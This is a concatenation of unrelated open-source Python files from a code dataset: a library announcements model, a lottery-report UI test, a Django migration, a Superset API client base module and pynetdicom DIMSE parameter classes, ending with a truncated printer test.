] | null | null | null | api/announcements.py | vbessonov/circulation | 3f522130242298181ce3f5e8392da70a1328fb74 | [
"Apache-2.0"
] | null | null | null | import datetime
from core.util.problem_detail import ProblemDetail
from admin.announcement_list_validator import AnnouncementListValidator
class Announcements(object):
    """Data model class for a library's announcements.

    This entire list is stored as a single
    ConfigurationSetting, which is why this isn't in core/model.
    """
    SETTING_NAME = "announcements"
    @classmethod
    def for_library(cls, library):
        """Load an Announcements object for the given Library.

        :param library: A Library
        """
        # An unset or empty setting yields an empty announcement list.
        announcements = library.setting(cls.SETTING_NAME).json_value or []
        return cls(announcements)
    def __init__(self, announcements):
        """Instantiate an Announcements object from a (potentially serialised)
        list.

        :param announcements: A value for the ANNOUNCEMENTS ConfigurationSetting,
            either serialized or un-.
        :return: A list of Announcement objects. The list will be empty if
            there are validation errors in `announcements`.
        """
        validator = AnnouncementListValidator()
        validated = validator.validate_announcements(announcements)
        if isinstance(validated, ProblemDetail):
            # There's a problem with the way the announcements were
            # serialized to the database. Treat this as an empty list.
            validated = []
        self.announcements = [Announcement(**data) for data in validated]
    @property
    def active(self):
        """Yield only the active announcements."""
        for a in self.announcements:
            if a.is_active:
                yield a
class Announcement(object):
    """Data model class for a single library-wide announcement."""
    def __init__(self, **kwargs):
        """Instantiate an Announcement from a dictionary of data.

        The data is assumed to be present and already validated.

        :param id: Globally unique ID for the Announcement.
        :param content: Textual content of the announcement.
        :param start: The date (relative to the time zone of the server)
            on which the announcement should start being published.
        :param finish: The date (relative to the time zone of the server)
            on which the announcement should stop being published.
        """
        validate_date = AnnouncementListValidator.validate_date
        self.id = kwargs.pop('id')
        self.content = kwargs.pop('content')
        # Normalize the publication window endpoints into date objects.
        self.start = validate_date("", kwargs.pop('start'))
        self.finish = validate_date("", kwargs.pop('finish'))
    @property
    def is_active(self):
        """Should this announcement be displayed now?"""
        return self.start <= datetime.date.today() <= self.finish
    @property
    def for_authentication_document(self):
        """The publishable representation of this announcement,
        for use in an authentication document.

        Basically just the ID and the content.
        """
        return {"id": self.id, "content": self.content}
ad556482ebe051369c9f101b2f13a4d7444b6604 | 1,192 | py | Python | test/reports/common-games/Terminal/test_previous_month_report_for_day.py | FearFactor1/SPA | a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7 | [
"Apache-2.0"
] | 1 | 2019-12-05T06:50:54.000Z | 2019-12-05T06:50:54.000Z | test/reports/common-games/Terminal/test_previous_month_report_for_day.py | FearFactor1/SPA | a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7 | [
"Apache-2.0"
] | null | null | null | test/reports/common-games/Terminal/test_previous_month_report_for_day.py | FearFactor1/SPA | a05aaa924c5bebb52cd508ebdf7fd3b81c49fac7 | [
"Apache-2.0"
] | null | null | null | # Отчёт за день + Кассовый отчёт + Обычные + Терминал + предыдущий месяц, к примеру будет 10 число
def test_previous_month(app):
    """Day report (cash report + regular lottery + terminal) for day 10 of
    the previous month: generates the report and checks that all expected
    section headers, seller/terminal identifiers, dates and line items
    appear in the parsed report text.
    """
    app.report.open_page_report()
    # Select day 10 of the previous month as the report date.
    app.report.previous_month_date_10()
    app.report.button_get_report()
    app.report.parser_report_text()
    # Russian section headers: "CASH REPORT FOR THE DAY", "REGULAR LOTTERY",
    # "TERMINAL TOTALS".
    assert "КАССОВЫЙ ОТЧЕТ ЗА ДЕНЬ" in app.report.parser_report_text()
    assert "ПО ОБЫЧНОЙ ЛОТЕРЕЕ" in app.report.parser_report_text()
    assert "ИТОГИ ПО ТЕРМИНАЛУ" in app.report.parser_report_text()
    # Seller ("Продавец") and terminal ("Терминал") identifiers.
    assert "Продавец: 2000006810-20003511" in app.report.parser_report_text()
    assert "Терминал: 2000006810" in app.report.parser_report_text()
    # Both date representations of day 10 of the previous month must appear.
    assert app.report.previous_month_C_day_10() in app.report.parser_report_text()
    assert app.report.previous_month_Po_day_10() in app.report.parser_report_text()
    # Line items: sales, bonus sales, cancellations, bonus cancellations,
    # payouts and the cash-desk grand total.
    assert 'Продажи' in app.report.parser_report_text()
    assert 'Продажи за бонусы' in app.report.parser_report_text()
    assert 'Отмены' in app.report.parser_report_text()
    assert 'Отмены за бонусы' in app.report.parser_report_text()
    assert 'Выплаты' in app.report.parser_report_text()
    assert 'ИТОГО ПО КАССЕ' in app.report.parser_report_text()
    app.report.comeback_main_page()
"MIT"
] | null | null | null | app/openmrs_viamo/migrations/0005_auto_20220508_2214.py | fxavier/siecho | c2f4dc6b1169b9db2349901a96adb190cf2e3f0a | [
"MIT"
] | null | null | null | app/openmrs_viamo/migrations/0005_auto_20220508_2214.py | fxavier/siecho | c2f4dc6b1169b9db2349901a96adb190cf2e3f0a | [
"MIT"
] | null | null | null | # Generated by Django 3.2.13 on 2022-05-08 22:14
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('openmrs_viamo', '0004_remove_missedappointment_tb'),
]
operations = [
migrations.AlterField(
model_name='missedappointment',
name='gender',
field=models.CharField(blank=True, max_length=150, null=True),
),
migrations.AlterField(
model_name='missedappointment',
name='health_facility',
field=models.CharField(blank=True, max_length=150, null=True),
),
]
| 26.416667 | 74 | 0.618297 |
ad8a36c3fe3ab51fdfc04c5a3b2c02cadddde168 | 6,674 | py | Python | supersetapiclient/base.py | opus-42/superset-api-client | df9ee80f7681ade8f4d2295c56967a23010f72ae | [
"Apache-2.0"
] | 11 | 2021-05-07T16:34:52.000Z | 2022-03-17T07:54:56.000Z | supersetapiclient/base.py | opus-42/superset-api-client | df9ee80f7681ade8f4d2295c56967a23010f72ae | [
"Apache-2.0"
] | 10 | 2021-10-08T20:03:59.000Z | 2022-03-18T18:28:09.000Z | supersetapiclient/base.py | opus-42/superset-api-client | df9ee80f7681ade8f4d2295c56967a23010f72ae | [
"Apache-2.0"
] | 6 | 2021-07-09T18:23:09.000Z | 2022-03-19T09:23:19.000Z | """Base classes."""
import logging
import dataclasses
import json
from requests import Response
from supersetapiclient.exceptions import NotFound
logger = logging.getLogger(__name__)
def json_field():
    """Dataclass field factory for JSON-encoded attributes: defaults to
    None and is hidden from the generated repr.
    """
    return dataclasses.field(default=None, repr=False)
def default_string():
    """Dataclass field factory for string attributes: defaults to the empty
    string and is hidden from the generated repr.
    """
    return dataclasses.field(default="", repr=False)
class Object:
    """Base class for a single Superset API object, backed by a dataclass
    subclass. `_parent` is the ObjectFactories instance that created it and
    supplies the HTTP client and endpoint URLs.
    """
    _parent = None
    # Names of dataclass fields whose values are JSON-encoded strings on the
    # wire and decoded to Python objects locally.
    JSON_FIELDS = []
    @classmethod
    def fields(cls):
        """Get the dataclass Field objects of this class."""
        return dataclasses.fields(cls)
    @classmethod
    def field_names(cls):
        """Get the set of dataclass field names."""
        return set(
            f.name
            for f in dataclasses.fields(cls)
        )
    @classmethod
    def from_json(cls, json: dict):
        """Create Object from json

        Args:
            json (dict): a dictionary

        Returns:
            Object: return the related object
        """
        # Ignore any keys the API returns that are not dataclass fields.
        field_names = cls.field_names()
        return cls(**{k:v for k,v in json.items() if k in field_names})
    def __post_init__(self):
        # Decode JSON-string fields into Python objects after dataclass init.
        for f in self.JSON_FIELDS:
            setattr(self, f, json.loads(getattr(self, f) or "{}"))
    @property
    def base_url(self) -> str:
        """URL of this object's API resource (collection URL + object id)."""
        return self._parent.client.join_urls(
            self._parent.base_url,
            str(self.id)
        )
    @property
    def import_url(self) -> str:
        # NOTE(review): identical to base_url — presumably a placeholder for a
        # dedicated per-object import endpoint; confirm against the API.
        return self._parent.client.join_urls(
            self._parent.base_url,
            str(self.id)
        )
    def fetch(self) -> None:
        """Fetch additional object information."""
        field_names = self.field_names()
        client = self._parent.client
        reponse = client.get(self.base_url)
        o = reponse.json()
        o = o.get("result")
        # Copy only known dataclass fields from the API payload onto self.
        for k, v in o.items():
            if k in field_names:
                setattr(self, k, v)
    def save(self) -> None:
        """Save object information."""
        # Send only the columns the API declares as editable; re-encode any
        # JSON fields back to strings for the wire format.
        o = {}
        for c in self._parent.edit_columns:
            if hasattr(self, c):
                value = getattr(self, c)
                if c in self.JSON_FIELDS:
                    value = json.dumps(value)
                o[c] = value
        response = self._parent.client.put(self.base_url, json=o)
        # Log the body of validation failures before raising.
        if response.status_code in [400, 422]:
            logger.error(response.text)
        response.raise_for_status()
class ObjectFactories:
endpoint = ""
base_object = None
_INFO_QUERY = {
"keys": [
"add_columns",
"edit_columns"
]
}
def __init__(self, client):
"""Create a new Dashboards endpoint.
Args:
client (client): superset client
"""
self.client = client
# Get infos
response = client.get(
client.join_urls(
self.base_url,
"_info",
),
params={
"q": json.dumps(self._INFO_QUERY)
})
if response.status_code != 200:
logger.error(f"Unable to build object factory for {self.endpoint}")
response.raise_for_status()
infos = response.json()
self.edit_columns = [
e.get("name")
for e in infos.get("edit_columns", [])
]
self.add_columns = [
e.get("name")
for e in infos.get("add_columns", [])
]
@property
def base_url(self):
"""Base url for these objects."""
return self.client.join_urls(
self.client.base_url,
self.endpoint,
)
@property
def import_url(self):
"""Base url for these objects."""
return self.client.join_urls(
self.client.base_url,
self.endpoint,
"import"
)
@staticmethod
def _handle_reponse_status(reponse: Response) -> None:
"""Handle response status."""
if reponse.status_code not in (200, 201):
logger.error(f"Unable to proceed with request on ")
logger.error(f"API response is {reponse.text}")
# Finally raising for status
reponse.raise_for_status()
def get(self, id: int):
"""Get an object by id."""
url = self.base_url + str(id)
response = self.client.get(
url
)
response.raise_for_status()
response = response.json()
object_json = response.get("result")
object_json["id"] = id
object = self.base_object.from_json(object_json)
object._parent = self
return object
def find(self, **kwargs):
"""Find and get objects from api."""
url = self.base_url
# Get response
if kwargs != {}:
query = {
"filters": [
{
"col": k,
"opr": "eq",
"value": v
} for k, v in kwargs.items()
]
}
params = {
"q": json.dumps(query)
}
else:
params = {}
response = self.client.get(
url,
params=params
)
response.raise_for_status()
response = response.json()
objects = []
for r in response.get("result"):
o = self.base_object.from_json(r)
o._parent = self
objects.append(o)
return objects
def find_one(self, **kwargs):
"""Find only object or raise an Exception."""
objects = self.find(**kwargs)
if len(objects) == 0:
raise NotFound(f"No {self.base_object.__name__} has been found.")
return objects[0]
def add(self, obj) -> int:
    """Create *obj* on the remote server and return the new object's id.

    Only attributes listed in ``self.add_columns`` are sent; values for
    columns in ``obj.JSON_FIELDS`` are serialised to JSON strings first.
    (The previous version also computed an unused local ``url``.)
    """
    payload = {}
    for column in self.add_columns:
        if hasattr(obj, column):
            value = getattr(obj, column)
            if column in obj.JSON_FIELDS:
                value = json.dumps(value)
            payload[column] = value
    response = self.client.post(self.base_url, json=payload)
    response.raise_for_status()
    return response.json().get("id")
def import_file(self, file_path) -> int:
    """Upload the file at *file_path* to the import endpoint.

    Returns True when the server acknowledges the import with
    ``{'message': 'OK'}`` and False otherwise.

    The previous version opened the file without ever closing it; the
    ``with`` block guarantees the handle is released even on error.
    """
    with open(file_path, 'rb') as fh:
        file = {'formData': (file_path, fh, 'application/json')}
        response = self.client.post(self.import_url, files=file)
    response.raise_for_status()
    # The server signals success with {'message': 'OK'}.
    return response.json().get('message') == 'OK'
| 26.172549 | 83 | 0.51828 |
8c0d4dcc41640686d5ebba52cb6e1c7ea44b7e2d | 15,421 | py | Python | netdicom/DIMSEparameters.py | mklassen/pynetdicom | 5024d5f66f366d21d0fb1adc51f98d9c313692f7 | [
"MIT"
] | 30 | 2015-09-07T22:25:16.000Z | 2017-12-06T17:11:51.000Z | netdicom/DIMSEparameters.py | mklassen/pynetdicom | 5024d5f66f366d21d0fb1adc51f98d9c313692f7 | [
"MIT"
] | 38 | 2015-09-09T23:38:49.000Z | 2017-07-26T08:34:42.000Z | netdicom/DIMSEparameters.py | mklassen/pynetdicom | 5024d5f66f366d21d0fb1adc51f98d9c313692f7 | [
"MIT"
] | 30 | 2015-09-08T14:35:45.000Z | 2017-11-06T20:39:47.000Z | #
# Copyright (c) 2012 Patrice Munger
# This file is part of pynetdicom, released under a modified MIT license.
# See the file license.txt included with this distribution, also
# available at http://pynetdicom.googlecode.com
#
def classprinter(klass):
    """Render every instance attribute of *klass* as a "name: value" line."""
    lines = ["%s: %s\n" % (attr, value) for attr, value in klass.__dict__.items()]
    return "".join(lines)
# DIMSE-C Services
class C_STORE_ServiceParameters:
    """Parameter set for the DIMSE C-STORE service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "Priority",
        "MoveOriginatorApplicationEntityTitle",
        "MoveOriginatorMessageID",
        "DataSet",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)

    def __repr__(self):
        return classprinter(self)
class C_FIND_ServiceParameters:
    """Parameter set for the DIMSE C-FIND service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "Priority",
        "Identifier",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)

    def __repr__(self):
        return classprinter(self)
class C_GET_ServiceParameters:
    """Parameter set for the DIMSE C-GET service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "Priority",
        "Identifier",
        "Status",
        "NumberOfRemainingSubOperations",
        "NumberOfCompletedSubOperations",
        "NumberOfFailedSubOperations",
        "NumberOfWarningSubOperations",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)

    def __repr__(self):
        return classprinter(self)
class C_MOVE_ServiceParameters:
    """Parameter set for the DIMSE C-MOVE service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "Priority",
        "MoveDestination",
        "Identifier",
        "Status",
        "NumberOfRemainingSubOperations",
        "NumberOfCompletedSubOperations",
        "NumberOfFailedSubOperations",
        "NumberOfWarningSubOperations",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)

    def __repr__(self):
        return classprinter(self)
class C_ECHO_ServiceParameters:
    """Parameter set for the DIMSE C-ECHO (verification) service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)

    def __repr__(self):
        return classprinter(self)
# DIMSE-N services
class N_EVENT_REPORT_ServiceParamters:
    """Parameter set for the DIMSE N-EVENT-REPORT service primitive.

    NOTE(review): the class name spells "Paramters"; kept as-is because
    external code imports it under this name.
    """

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "EventTypeID",
        "EventInformation",
        "EventReply",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)
class N_GET_ServiceParamters:
    """Parameter set for the DIMSE N-GET service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "RequestedSOPClassUID",
        "RequestedSOPInstanceUID",
        "AttributeIdentifierList",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "AttributeList",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)
class N_SET_ServiceParamters:
    """Parameter set for the DIMSE N-SET service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "RequestedSOPClassUID",
        "RequestedSOPInstanceUID",
        "ModificationList",
        "AttributeList",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)
class N_ACTION_ServiceParamters:
    """Parameter set for the DIMSE N-ACTION service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "RequestedSOPClassUID",
        "RequestedSOPInstanceUID",
        "ActionTypeID",
        "ActionInformation",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "ActionReply",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)
class N_CREATE_ServiceParamters:
    """Parameter set for the DIMSE N-CREATE service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "AttributeList",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)
class N_DELETE_ServiceParamters:
    """Parameter set for the DIMSE N-DELETE service primitive."""

    _FIELDS = (
        "MessageID",
        "MessageIDBeingRespondedTo",
        "RequestedSOPClassUID",
        "RequestedSOPInstanceUID",
        "AffectedSOPClassUID",
        "AffectedSOPInstanceUID",
        "Status",
    )

    def __init__(self):
        # Every parameter starts unset; the service user fills them in.
        for field in self._FIELDS:
            setattr(self, field, None)
class C_STORE_RQ_Message:
    """Placeholder for the C-STORE-RQ message; no fields are defined yet."""

    def __init__(self):
        # Intentionally empty: message state has not been implemented.
        pass
class C_STORE_Service:
    """Service object owning a fresh C-STORE parameter set."""

    def __init__(self):
        # Each service instance gets its own, independent parameter set.
        self.Parameters = C_STORE_ServiceParameters()
#
#
# Extended association stuff: defined in part 3.7
#
#
#
#
#
class ImplementationClassUIDParameters:
    """User-level parameters for the Implementation Class UID item."""

    def __init__(self):
        # UID string; the caller sets this before conversion.
        self.ImplementationClassUID = None

    def ToParams(self):
        """Build the wire-level sub-item carrying this UID."""
        item = ImplementationClassUIDSubItem()
        item.FromParams(self)
        return item
class ImplementationClassUIDSubItem:
    """Wire-level Implementation Class UID sub-item (item type 0x52).

    Layout: item type (1 byte), reserved (1 byte), item length
    (big-endian unsigned short), then the UID string.

    NOTE(review): Encode()/Decode() concatenate struct.pack() output onto
    a str, which only works on Python 2 — presumably this module predates
    a Python 3 port; confirm before reuse.
    """

    def __init__(self):
        self.ItemType = 0x52  # Unsigned byte
        # Unsigned byte 0x00
        self.Reserved = 0x00
        self.ItemLength = None  # Unsigned short
        self.ImplementationClassUID = None  # String

    def FromParams(self, Params):
        """Fill this sub-item from an ImplementationClassUIDParameters."""
        self.ImplementationClassUID = Params.ImplementationClassUID
        self.ItemLength = len(self.ImplementationClassUID)

    def ToParams(self):
        """Convert back to the user-level parameters object."""
        tmp = ImplementationClassUIDParameters()
        tmp.ImplementationClassUID = self.ImplementationClassUID
        return tmp

    def Encode(self):
        """Serialise the sub-item to its on-the-wire representation."""
        tmp = ''
        tmp = tmp + struct.pack('B', self.ItemType)
        tmp = tmp + struct.pack('B', self.Reserved)
        tmp = tmp + struct.pack('>H', self.ItemLength)  # big-endian length
        tmp = tmp + self.ImplementationClassUID
        return tmp

    def Decode(self, Stream):
        """Read the sub-item from a file-like Stream (4-byte header, then UID)."""
        (self.ItemType, self.Reserved,
         self.ItemLength) = struct.unpack('> B B H', Stream.read(4))
        self.ImplementationClassUID = Stream.read(self.ItemLength)

    def TotalLength(self):
        """Total encoded size: 4 header bytes plus the item body."""
        return 4 + self.ItemLength

    def __repr__(self):
        tmp = " Implementation class IUD sub item\n"
        tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
        tmp = tmp + " Item length: %d\n" % self.ItemLength
        tmp = tmp + \
            " SOP class UID length: %s\n" % self.ImplementationClassUID
        return tmp
#
#
#
class ImplementationVersionNameParameters:
    """User-level parameters for the Implementation Version Name item."""

    def __init__(self):
        # Version name string; the caller sets this before conversion.
        self.ImplementationVersionName = None

    def ToParams(self):
        """Build the wire-level sub-item carrying this version name."""
        item = ImplementationVersionNameSubItem()
        item.FromParams(self)
        return item
class ImplementationVersionNameSubItem:
    """Wire-level Implementation Version Name sub-item (item type 0x55).

    Layout: item type (1 byte), reserved (1 byte), item length
    (big-endian unsigned short), then the version name string.

    NOTE(review): Encode()/Decode() concatenate struct.pack() output onto
    a str — Python-2-only behaviour.
    """

    def __init__(self):
        self.ItemType = 0x55  # Unsigned byte
        # Unsigned byte 0x00
        self.Reserved = 0x00
        self.ItemLength = None  # Unsigned short
        self.ImplementationVersionName = None  # String

    def FromParams(self, Params):
        """Fill this sub-item from an ImplementationVersionNameParameters."""
        self.ImplementationVersionName = Params.ImplementationVersionName
        self.ItemLength = len(self.ImplementationVersionName)

    def ToParams(self):
        """Convert back to the user-level parameters object."""
        tmp = ImplementationVersionNameParameters()
        tmp.ImplementationVersionName = self.ImplementationVersionName
        return tmp

    def Encode(self):
        """Serialise the sub-item to its on-the-wire representation."""
        tmp = ''
        tmp = tmp + struct.pack('B', self.ItemType)
        tmp = tmp + struct.pack('B', self.Reserved)
        tmp = tmp + struct.pack('>H', self.ItemLength)  # big-endian length
        tmp = tmp + self.ImplementationVersionName
        return tmp

    def Decode(self, Stream):
        """Read the sub-item from a file-like Stream (4-byte header, then name)."""
        (self.ItemType, self.Reserved,
         self.ItemLength) = struct.unpack('> B B H', Stream.read(4))
        self.ImplementationVersionName = Stream.read(self.ItemLength)

    def TotalLength(self):
        """Total encoded size: 4 header bytes plus the item body."""
        return 4 + self.ItemLength

    def __repr__(self):
        tmp = " Implementation version name sub item\n"
        tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
        tmp = tmp + " Item length: %d\n" % self.ItemLength
        tmp = tmp + \
            " SOP class UID length: %s\n" % self.ImplementationVersionName
        return tmp
class AsynchronousOperationsWindowSubItem:
    """Wire-level Asynchronous Operations Window sub-item (item type 0x53).

    Layout: item type (1 byte), reserved (1 byte), fixed item length of 4,
    then two big-endian unsigned shorts: maximum operations invoked and
    maximum operations performed.

    NOTE(review): Encode() concatenates struct.pack() output onto a str —
    Python-2-only behaviour.
    """

    def __init__(self):
        # Unsigned byte
        self.ItemType = 0x53
        # Unsigned byte
        self.Reserved = 0x00
        # Unsigned short; fixed body size (two ushorts)
        self.ItemLength = 0x0004
        self.MaximumNumberOperationsInvoked = None  # Unsigned short
        # Unsigned short
        self.MaximumNumberOperationsPerformed = None

    def FromParams(self, Params):
        """Copy the two window limits from a parameters object."""
        self.MaximumNumberOperationsInvoked = \
            Params.MaximumNumberOperationsInvoked
        self.MaximumNumberOperationsPerformed = \
            Params.MaximumNumberOperationsPerformed

    def ToParams(self):
        """Return a copy of this sub-item carrying the same limits.

        NOTE(review): unlike the other items this returns another SubItem,
        not a distinct Parameters class — apparently by design.
        """
        tmp = AsynchronousOperationsWindowSubItem()
        tmp.MaximumNumberOperationsInvoked = \
            self.MaximumNumberOperationsInvoked
        tmp.MaximumNumberOperationsPerformed = \
            self.MaximumNumberOperationsPerformed
        return tmp

    def Encode(self):
        """Serialise the sub-item to its on-the-wire representation."""
        tmp = ''
        tmp = tmp + struct.pack('B', self.ItemType)
        tmp = tmp + struct.pack('B', self.Reserved)
        tmp = tmp + struct.pack('>H', self.ItemLength)
        tmp = tmp + struct.pack('>H', self.MaximumNumberOperationsInvoked)
        tmp = tmp + struct.pack('>H', self.MaximumNumberOperationsPerformed)
        return tmp

    def Decode(self, Stream):
        """Read the fixed 8-byte sub-item from a file-like Stream."""
        (self.ItemType, self.Reserved, self.ItemLength,
         self.MaximumNumberOperationsInvoked,
         self.MaximumNumberOperationsPerformed) = struct.unpack('> B B H H H',
                                                                Stream.read(8))

    def TotalLength(self):
        """Total encoded size: 4 header bytes plus the item body."""
        return 4 + self.ItemLength

    def __repr__(self):
        tmp = " Asynchoneous operation window sub item\n"
        tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
        tmp = tmp + " Item length: %d\n" % self.ItemLength
        tmp = tmp + \
            " Maximum number of operations invoked: %d\n" % \
            self.MaximumNumberOperationsInvoked
        tmp = tmp + \
            " Maximum number of operations performed: %d\n" % \
            self.MaximumNumberOperationsPerformed
        return tmp
import struct
class SCP_SCU_RoleSelectionParameters:
    """User-level parameters for SCP/SCU role selection negotiation."""

    def __init__(self):
        # SOP class UID plus the two role flags, all unset initially.
        for name in ("SOPClassUID", "SCURole", "SCPRole"):
            setattr(self, name, None)

    def ToParams(self):
        """Build the wire-level sub-item for these role values."""
        item = SCP_SCU_RoleSelectionSubItem()
        item.FromParams(self)
        return item
class SCP_SCU_RoleSelectionSubItem:
    """Wire-level SCP/SCU role selection sub-item (item type 0x54).

    Layout: item type (1 byte), reserved (1 byte), item length
    (big-endian ushort), UID length (big-endian ushort), the SOP class
    UID string, then one byte each for the SCU and SCP role flags.

    NOTE(review): Encode() concatenates struct.pack() output onto a str —
    Python-2-only behaviour.
    """

    def __init__(self):
        self.ItemType = 0x54  # Unsigned byte
        self.Reserved = 0x00  # Unsigned byte 0x00
        self.ItemLength = None  # Unsigned short
        self.UIDLength = None  # Unsigned short
        self.SOPClassUID = None  # String
        self.SCURole = None  # Unsigned byte
        self.SCPRole = None  # Unsigned byte

    def FromParams(self, Params):
        """Fill this sub-item from SCP_SCU_RoleSelectionParameters."""
        self.SOPClassUID = Params.SOPClassUID
        self.SCURole = Params.SCURole
        self.SCPRole = Params.SCPRole
        # Item body = 2-byte UID length field + UID + two role bytes.
        self.ItemLength = 4 + len(self.SOPClassUID)
        self.UIDLength = len(self.SOPClassUID)

    def ToParams(self):
        """Convert back to the user-level parameters object."""
        tmp = SCP_SCU_RoleSelectionParameters()
        tmp.SOPClassUID = self.SOPClassUID
        tmp.SCURole = self.SCURole
        tmp.SCPRole = self.SCPRole
        return tmp

    def Encode(self):
        """Serialise the sub-item to its on-the-wire representation."""
        tmp = ''
        tmp += struct.pack('B', self.ItemType)
        tmp += struct.pack('B', self.Reserved)
        tmp += struct.pack('>H', self.ItemLength)
        tmp += struct.pack('>H', self.UIDLength)
        tmp += self.SOPClassUID
        tmp += struct.pack('B B', self.SCURole, self.SCPRole)
        return tmp

    def Decode(self, Stream):
        """Read the sub-item from a file-like Stream (header, UID, roles)."""
        (self.ItemType, self.Reserved,
         self.ItemLength, self.UIDLength) = struct.unpack('> B B H H',
                                                          Stream.read(6))
        self.SOPClassUID = Stream.read(self.UIDLength)
        (self.SCURole, self.SCPRole) = struct.unpack('B B', Stream.read(2))

    def TotalLength(self):
        """Total encoded size: 4 header bytes plus the item body."""
        return 4 + self.ItemLength

    def __repr__(self):
        tmp = " SCU/SCP role selection sub item\n"
        tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
        tmp = tmp + " Item length: %d\n" % self.ItemLength
        tmp = tmp + " SOP class UID length: %d\n" % self.UIDLength
        tmp = tmp + " SOP class UID: %s\n" % self.SOPClassUID
        tmp = tmp + " SCU Role: %d\n" % self.SCURole
        tmp = tmp + " SCP Role: %d" % self.SCPRole
        return tmp
# needs to be re-worked
# class SOPClassExtentedNegociationSubItem:
# def __init__(self):
# self.ItemType = 0x56 # Unsigned byte
# self.Reserved = 0x00 # Unsigned byte - 0x00
# self.ItemLength = None # Unsigned short
# self.SOPClassUIDLength = None # Unsigned short
# self.SOPClassUID = None # String
# self.ServiceClassApplicationInformation = None # Class
#
# def FromParams(self, Params):
# self.SOPClassUID = Params.SOPClassUID
# self.ServiceClassApplicationInformation = \
# Params.ServiceClassApplicationInformation()
# self.SOPClassUIDLength = len(self.SOPClassUID)
# self.ItemLength = 2 + self.SOPClassUIDLength + \
# self.ServiceClassApplicationInformation.TotalLength()
#
# def ToParams(self):
# tmp = SOPClassExtentedNegociationSubItem()
# tmp.SOPClassUID = self.SOPClassUID
# tmp.ServiceClassApplicationInformation = \
# self.ServiceClassApplicationInformation
# return (self.SOPClassUID, \
# self.ServiceClassApplicationInformation.Decompose())
#
# def Encode(self):
# tmp = ''
# tmp = tmp + struct.pack('B', self.ItemType)
# tmp = tmp + struct.pack('B', self.Reserved)
# tmp = tmp + struct.pack('>H', self.ItemLength)
# tmp = tmp + struct.pack('>H', self.SOPClassUIDLength)
# tmp = tmp + self.SOPClassUID
# tmp = tmp + self.ServiceClassApplicationInformation.Encode()
# return tmp
#
# def Decode(self,Stream):
# (self.ItemType, self.Reserved,
# self.ItemLength, self.SOPClassUIDLength) = \
# struct.unpack('> B B H H', Stream.read(6))
# self.SOPClassUID = Stream.read(self.UIDLength)
# self.ServiceClassApplicationInformation.Decode(Stream)
#
# def TotalLength(self):
# return 4 + self.ItemLength
#
#
#
# def __repr__(self):
# tmp = " SOP class extended negociation sub item\n"
# tmp = tmp + " Item type: 0x%02x\n" % self.ItemType
# tmp = tmp + " Item length: %d\n" % self.ItemLength
# tmp = tmp + " SOP class UID length: %d\n" % self.SOPClassUIDLength
# tmp = tmp + " SOP class UID: %s" % self.SOPClassUID
# return tmp
#
| 30.965863 | 79 | 0.620582 |
f644cfa7f50d8618319452d097808d17fc6e0707 | 1,864 | py | Python | tools/dahyeprinter/test_printer.py | JiniousChoi/encyclopedia-in-code | 77bc551a03a2a3e3808e50016ece14adb5cfbd96 | [
"MIT"
] | 2 | 2018-07-20T10:15:49.000Z | 2018-07-20T10:16:54.000Z | tools/dahyeprinter/test_printer.py | JiniousChoi/encyclopedia-in-code | 77bc551a03a2a3e3808e50016ece14adb5cfbd96 | [
"MIT"
] | 2 | 2018-06-26T09:12:44.000Z | 2019-12-18T00:09:14.000Z | tools/dahyeprinter/test_printer.py | JiniousChoi/encyclopedia-in-code | 77bc551a03a2a3e3808e50016ece14adb5cfbd96 | [
"MIT"
] | null | null | null | #!/usr/bin/python3
import unittest
from printer import pages_in_order, _pairing, _taking_odd, _taking_even, _flattening
class PrinterTest(unittest.TestCase):
def test_even_pages(self):
tot_pages, per_each_page = 4, 1
fp, sp = pages_in_order(tot_pages, per_each_page)
self.assertEqual(fp, [1,3])
